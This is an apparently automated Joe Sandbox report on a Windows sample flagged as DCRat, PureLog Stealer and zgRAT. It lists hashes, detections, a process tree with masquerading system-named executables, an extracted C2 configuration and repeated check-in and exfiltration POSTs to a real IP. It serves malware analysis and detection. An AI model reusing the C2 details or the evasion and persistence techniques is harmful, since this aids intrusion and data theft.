Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XNPOazHpXF.exe

Overview

General Information

Sample name:XNPOazHpXF.exe
renamed because original name is a hash value
Original sample name:ADAE028E0A5A72D219A02BB06D92241A.exe
Analysis ID:1579268
MD5:adae028e0a5a72d219a02bb06d92241a
SHA1:7cae683f773d541bd5c76ce6491ccb2f2f05c08a
SHA256:3ac51e8fc3aa517aea4640efaffa1b04301c14dc876104e09ab9b7a3a95a0415
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to detect virtual machines (SGDT)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XNPOazHpXF.exe (PID: 5688 cmdline: "C:\Users\user\Desktop\XNPOazHpXF.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
    • cmd.exe (PID: 3628 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 4408 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 4280 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • services.exe (PID: 1352 cmdline: "C:\Windows\InputMethod\CHT\services.exe" MD5: ADAE028E0A5A72D219A02BB06D92241A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
XNPOazHpXF.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    XNPOazHpXF.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\dllhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\dllhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000007.00000002.3303823064.0000000003794000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000007.00000002.3303823064.00000000032FB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000007.00000002.3303823064.000000000391B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000000.00000000.2052319303.0000000000FB2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.XNPOazHpXF.exe.fb0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.XNPOazHpXF.exe.fb0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\XNPOazHpXF.exe, ProcessId: 5688, TargetFilename: C:\Recovery\dllhost.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\InputMethod\CHT\services.exe" , CommandLine: "C:\Windows\InputMethod\CHT\services.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\InputMethod\CHT\services.exe, NewProcessName: C:\Windows\InputMethod\CHT\services.exe, OriginalFileName: C:\Windows\InputMethod\CHT\services.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3628, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows\InputMethod\CHT\services.exe" , ProcessId: 1352, ProcessName: services.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T10:47:25.908690+010020480951A Network Trojan was detected192.168.2.54971489.23.96.18080TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T10:47:46.710148+010020481301A Network Trojan was detected192.168.2.54977889.23.96.18080TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: XNPOazHpXF.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Users\user\Desktop\MpvkKZGd.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                              Source: C:\Recovery\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                              Source: C:\Users\user\Desktop\BwIEkNWR.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\QKKBSDQi.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                              Source: C:\Users\user\Desktop\KnJCpqCi.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\SVgCSVvi.logAvira: detection malicious, Label: TR/AD.BitpyRansom.lcksd
                              Source: C:\Users\user\Desktop\BKAMFwmA.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\AppData\Local\Temp\1kuSaYZZpb.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\Desktop\MYoSwDMa.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1339906
                              Found malware configuration
                              Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeReversingLabs: Detection: 73%
                              Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeReversingLabs: Detection: 73%
                              Source: C:\Recovery\conhost.exeReversingLabs: Detection: 73%
                              Source: C:\Recovery\dllhost.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\BwIEkNWR.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\DujMFNlM.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\FsHliKMo.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\IzFuDcGk.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\JedTEJPv.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\LozUEcuw.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\MYoSwDMa.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\McDcppqu.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\MpvkKZGd.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\QOfJDANU.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\RdNjnWVR.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\SVgCSVvi.logReversingLabs: Detection: 33%
                              Source: C:\Users\user\Desktop\TuCjUNij.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\UbnsZBxQ.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\YwCJgfGU.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\cEzSCxAQ.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\hnCGlIml.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\hrRQfuPE.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\iSjOnjPm.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\lQBpXVWv.logReversingLabs: Detection: 15%
                              Source: C:\Users\user\Desktop\naXqXoBw.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\olqGOXgZ.logReversingLabs: Detection: 33%
                              Source: C:\Users\user\Desktop\qWWWVlrS.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\qeFoAUSY.logReversingLabs: Detection: 15%
                              Source: C:\Users\user\Desktop\uMMNchrL.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\yGSOdQVY.logReversingLabs: Detection: 29%
                              Source: C:\Windows\InputMethod\CHT\services.exeReversingLabs: Detection: 73%
                              Multi AV Scanner detection for submitted file
                              Source: XNPOazHpXF.exeReversingLabs: Detection: 73%
                              Source: XNPOazHpXF.exeVirustotal: Detection: 60%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\ProgramData\OfJItdCHnFwJKGdVvarOLqclbfs.exeJoe Sandbox ML: detected
                              Source: C:\Recovery\dllhost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\QKKBSDQi.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\XNPOazHpXF.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\FsHliKMo.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\McDcppqu.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\KnJCpqCi.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\QgmbSWHW.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\BKAMFwmA.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\EvgdMKxt.logJoe Sandbox ML: detected
                              Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: XNPOazHpXF.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["SQiDocn60p5igPZHgvkZipIORtqG4iK2FRWuhXyFf4g6iOZq7oF5C05nHTv5vhBSfDcO2pkJ6e3oIMpDUAJPdOzPWtmNl3U82ObfwKyRE59h6Re5oslvYwyQNN2ICXhC","886b964eacdf58df64ccd2e35a7cc93f02ef5b995bb1b61ec19d87c5f2d1fe93","0","","","5","2","WyIxIiwiIiwiNSJd","WyIxIiwiV3lJaUxDSWlMQ0psZVVsM1NXcHZhV1V4VGxwVk1WSkdWRlZTVTFOV1drWm1VemxXWXpKV2VXTjVPR2xNUTBsNFNXcHZhVnB0Um5Oak1sVnBURU5KZVVscWIybGFiVVp6WXpKVmFVeERTWHBKYW05cFpFaEtNVnBUU1hOSmFsRnBUMmxLTUdOdVZteEphWGRwVGxOSk5rbHVVbmxrVjFWcFRFTkpNa2xxYjJsa1NFb3hXbE5KYzBscVkybFBhVXB0V1ZkNGVscFRTWE5KYW1kcFQybEtNR051Vm14SmFYZHBUMU5KTmtsdVVubGtWMVZwVEVOSmVFMURTVFpKYmxKNVpGZFZhVXhEU1hoTlUwazJTVzVTZVdSWFZXbE1RMGw0VFdsSk5rbHVVbmxrVjFWcFRFTkplRTE1U1RaSmJsSjVaRmRWYVV4RFNYaE9RMGsyU1c1U2VXUlhWV2xtVVQwOUlsMD0iXQ=="]
                              Source: 00000000.00000002.2117348326.0000000013BDF000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://89.23.96.180/03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/","ImagepythonRequestLowGeocpuwpTemporary"]]
                              Source: XNPOazHpXF.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: XNPOazHpXF.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\XNPOazHpXF.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FF8490CB81D
                              Source: C:\Windows\InputMethod\CHT\services.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh7_2_00007FF8490EB81D

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.5:49714 -> 89.23.96.180:80
                              Source: Network trafficSuricata IDS: 2048130 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) : 192.168.2.5:49778 -> 89.23.96.180:80
                              Uses ping.exe to check the status of other devices and networks
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                              Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2100Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2100Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: multipart/form-data; boundary=----zeihSAIObDfjW2EHuTgVjvpXZJn4D45JgoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 124358Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2112Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /03/authtraffic_1/PythonApi/Linux/8Cdnsecureprotect/multi/1/mariadb7Cdn/24/Lowlongpollvm/ImagepythonRequestLowGeocpuwpTemporary.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53Host: 89.23.96.180Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
